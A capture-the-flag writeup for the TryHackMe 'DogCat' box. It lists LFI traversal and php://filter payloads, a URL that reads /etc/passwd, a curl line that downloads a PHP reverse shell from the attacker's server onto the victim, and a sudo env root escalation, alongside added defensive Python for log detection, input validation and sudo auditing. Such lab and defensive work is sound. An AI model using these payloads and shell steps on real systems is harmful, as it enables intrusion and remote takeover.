
DogCat TryHackMe

VIDEO WRITEUP

https://youtu.be/wnEVK7xIfcY

Enumeration

Nmap:

image

With only SSH and HTTP open, the entry point is most likely a web vulnerability.

WhatWeb:

image

Web with Browser:

image

I click on dog and I see this:

image

In the URL I see a "view" parameter. It looks like LFI, so let's try some basic payloads.

image

That message can mean one of two things:

either the site is protected against LFI, or the developer added filters so that an LFI cannot be executed so easily.

Payloads:

../../../../etc/passwd = No Work

../../../../etc/passwd%00 = No Work

%252e%252e%252fetc%252fpasswd = No Work

%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 = No Work

/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd = No Work

Wrappers:

Let's try with LFI Wrappers:

expect://whoami = No Work

php://filter/convert.base64-encode/resource=index.php = No work

Okay, nothing works, but I try adding cat or dog: it is possible that the filter checks whether the word dog or cat is present.

Payload: dog/etc/passwd

image

That's It!!

Every time I click on cat or dog I get a different picture, which makes me think that a PHP file is being executed.

Looking at the page source makes it very clear.

So, to check, I need to use the php://filter wrapper with base64 encoding and ask it for the cat or dog page.

image

WORKS!!! Let's decode the Base64.

image

Same with the dog file

image

FFUF:

The web app appends a .php extension to every query.

image

Trying payloads, I found the correct one

image

Decoded base64 index.php code

image

Other FFUF

image

Flag

image

image

Looking at the index.php code, I see that an "ext" parameter is expected in the GET request.

http://10.10.64.213/?view=php://filter/convert.base64-encode/resource=dog/../flag&ext=.php == WORKS GOOD

http://10.10.24.8/?view=php://filter/convert.base64-encode/resource=dog/../../../../&ext=etc/passwd == WORKS GOOD!!!!!!!!
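To make the difference between the two checks concrete, here is an added example in Python (not the box's real index.php, which the writeup shows only as a screenshot). It models the behaviour the writeup infers: the application only requires the word dog or cat somewhere in view and then appends ext, so "dog/../../../../" with ext=etc/passwd gets through, and it puts that beside a hardened resolver that allowlists the page name, refuses a caller-supplied extension and confirms the normalised path stays under the web root. WEB_ROOT, ALLOWED_VIEWS and the function names are assumptions made for the example.

```python
import os
from typing import Optional

# Assumed document root for the example; the real app's path is not in the writeup.
WEB_ROOT = "/var/www/html"
# The two pages the app legitimately serves.
ALLOWED_VIEWS = {"cat", "dog"}


def vulnerable_resolve(view: str, ext: str = ".php") -> Optional[str]:
    """Model of the weak check the writeup infers from index.php:
    accept any view that merely contains 'dog' or 'cat', then append ext.
    Returns the string that would be handed to include(), or None if rejected."""
    if "dog" in view or "cat" in view:
        return view + ext
    return None


def hardened_resolve(view: str, ext: str = ".php") -> Optional[str]:
    """Allowlist the page name, refuse a caller-controlled extension, and
    check that the normalised path is still inside WEB_ROOT.
    Stream wrappers such as php://filter fail the allowlist outright."""
    if view not in ALLOWED_VIEWS:
        return None
    if ext != ".php":
        return None
    candidate = os.path.normpath(os.path.join(WEB_ROOT, view + ext))
    # commonpath is a second line of defence should the allowlist ever be loosened.
    if os.path.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


# The legitimate request plus payloads taken from the writeup, for comparison.
PAYLOADS = [
    ("dog", ".php"),
    ("../../../../etc/passwd", ".php"),
    ("php://filter/convert.base64-encode/resource=dog", ".php"),
    ("dog/../../../../", "etc/passwd"),
]


def compare(payloads=PAYLOADS):
    """Return, per payload, what each resolver would hand to include()."""
    return [
        (view, ext, vulnerable_resolve(view, ext), hardened_resolve(view, ext))
        for view, ext in payloads
    ]


if __name__ == "__main__":
    for view, ext, weak, strong in compare():
        print(f"view={view!r:55} ext={ext!r:14} weak={weak!r} hardened={strong!r}")
```

Running the block shows that the substring check rejects the plain "../../../../etc/passwd" (which is why those first payloads gave "No Work") but happily passes anything that contains dog, wrapper included, while the hardened resolver only ever returns the two real page paths.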

/etc/passwd

image

From /etc/hosts I can see this: it is a Docker container.

image
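From the detection side, every request in this section leaves a trace in the web server's access log. The following added example (not part of the writeup) scans constructed Apache-style log lines modelled on the requests above and flags the php:// wrapper, directory traversal (including the double-encoded and overlong-UTF-8 variants tried earlier), null bytes, references to sensitive files, and an ext parameter that is not the expected ".php". The log lines, IPs and timestamps are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines modelled on the requests in the
# writeup; the IPs, timestamps and sizes are made up for the example.
LOG_LINES = [
    '10.8.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.8.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /?view=../../../../etc/passwd HTTP/1.1" 200 48 "-" "curl/7.88"',
    '10.8.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /?view=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 48 "-" "curl/7.88"',
    '10.8.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /?view=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 HTTP/1.1" 200 48 "-" "curl/7.88"',
    '10.8.0.5 - - [01/Jan/2024:10:00:31 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog HTTP/1.1" 200 2210 "-" "curl/7.88"',
    '10.8.0.5 - - [01/Jan/2024:10:00:45 +0000] "GET /?view=dog/../../../../&ext=etc/passwd HTTP/1.1" 200 1390 "-" "curl/7.88"',
    '10.8.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /cats/1.jpg HTTP/1.1" 200 30411 "-" "Mozilla/5.0"',
]

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')

# Each indicator is checked against the raw target and its decoded forms.
INDICATORS = {
    "php_wrapper": re.compile(r"php://", re.IGNORECASE),
    "traversal": re.compile(r"\.\.[/\\]"),
    "overlong_utf8": re.compile(r"%c0%ae", re.IGNORECASE),
    "null_byte": re.compile(r"%00|\x00"),
    "sensitive_file": re.compile(r"(?:^|[/=])etc/(?:passwd|shadow|hosts)", re.IGNORECASE),
    # The app expects ext=.php; anything else is an attempt to change the included file.
    "ext_override": re.compile(r"[?&]ext=(?!\.php(?:&|$))", re.IGNORECASE),
}


def decode_forms(target: str, rounds: int = 2) -> list:
    """Return the raw target plus up to `rounds` successive URL decodings,
    so double-encoded traversal (%252e%252e%252f) is caught as well."""
    forms = [target]
    current = target
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        forms.append(decoded)
        current = decoded
    return forms


def scan_line(line: str):
    """Return (target, sorted indicator names) or None if the line is clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = m.group("target")
    forms = decode_forms(target)
    hits = {
        name
        for name, pattern in INDICATORS.items()
        if any(pattern.search(form) for form in forms)
    }
    return (target, sorted(hits)) if hits else None


def scan_log(lines):
    """Scan every line and keep only the suspicious ones, in log order."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


if __name__ == "__main__":
    for target, tags in scan_log(LOG_LINES):
        print(f"{', '.join(tags):45} {target}")
```

Matching against the decoded forms as well as the raw string is what catches the %252e variant, while the overlong-UTF-8 and %00 indicators are matched on the raw string because decoding turns them into replacement characters. The benign "?view=dog" and the image request produce no hits.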

RCE

Now it's time to escalate to remote code execution.

With this command:

image

I have RCE, but I can't turn it into a shell directly.

I need to upload my PHP reverse shell.

To upload it, I follow these steps:

1. Configure the PHP file

image

2. Start a Python HTTP server

image

3. Download and save the shell on the victim machine

curl -o shell.php 10.8.222.251:8000/shell.php

4. Start your listener

image

5. Open the shell file in the browser

http://10.10.223.232/shell.php

And you have a working shell.

PrivEsc

sudo -l

ENV ROOT SHELL

I see this user can execute the env command with sudo permissions.

GTFOBINS

image

sudo /usr/bin/env /bin/bash

Root Shell

image
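The sudo rule that made this escalation possible is exactly the kind of thing a configuration audit should catch before an attacker does. As an added example (not from the writeup), the Python below parses constructed `sudo -l` output modelled on the one above, and flags any rule whose binary is one GTFOBins documents as able to spawn a shell under sudo. The host name, the second rule and the short SHELL_ESCAPE_BINS list are assumptions for the example; a real audit would use the full GTFOBins sudo list.

```python
import os
import re

# Constructed `sudo -l` output modelled on the writeup; the host name and the
# harmless second rule are made up for the example.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on 1a2b3c4d5e6f:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on 1a2b3c4d5e6f:
    (root) NOPASSWD: /usr/bin/env
    (root) /usr/bin/id
"""

# Binaries GTFOBins lists as able to spawn a shell when run through sudo.
# Assumption for the example: only a handful are listed here.
SHELL_ESCAPE_BINS = {"env", "bash", "sh", "vim", "find", "awk", "python3", "perl"}

# One sudoers rule line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$"
)


def parse_sudo_l(text: str):
    """Return a list of (runas, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append((m.group("runas"), nopasswd, cmd))
    return rules


def risky_rules(text: str):
    """Rules whose command basename is a known shell-escape binary."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_ESCAPE_BINS:
            findings.append((runas, nopasswd, cmd, binary))
    return findings


if __name__ == "__main__":
    for runas, nopasswd, cmd, binary in risky_rules(SUDO_L_OUTPUT):
        flag = "NOPASSWD " if nopasswd else ""
        print(f"({runas}) {flag}{cmd}  -> '{binary}' can spawn a shell; restrict or remove this rule")
```

On the sample output only the env rule is reported, with its NOPASSWD tag, which is the rule that should be removed or replaced with a tightly scoped command.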

Flag 2 and 3

image

/opt/backups

I found this!!

image

image

tar -xvf backup.tar

BreakOut Container

image

image

image

And Wait...

image

Root Flag

image

DEMO:

https://youtu.be/wnEVK7xIfcY

Thanks!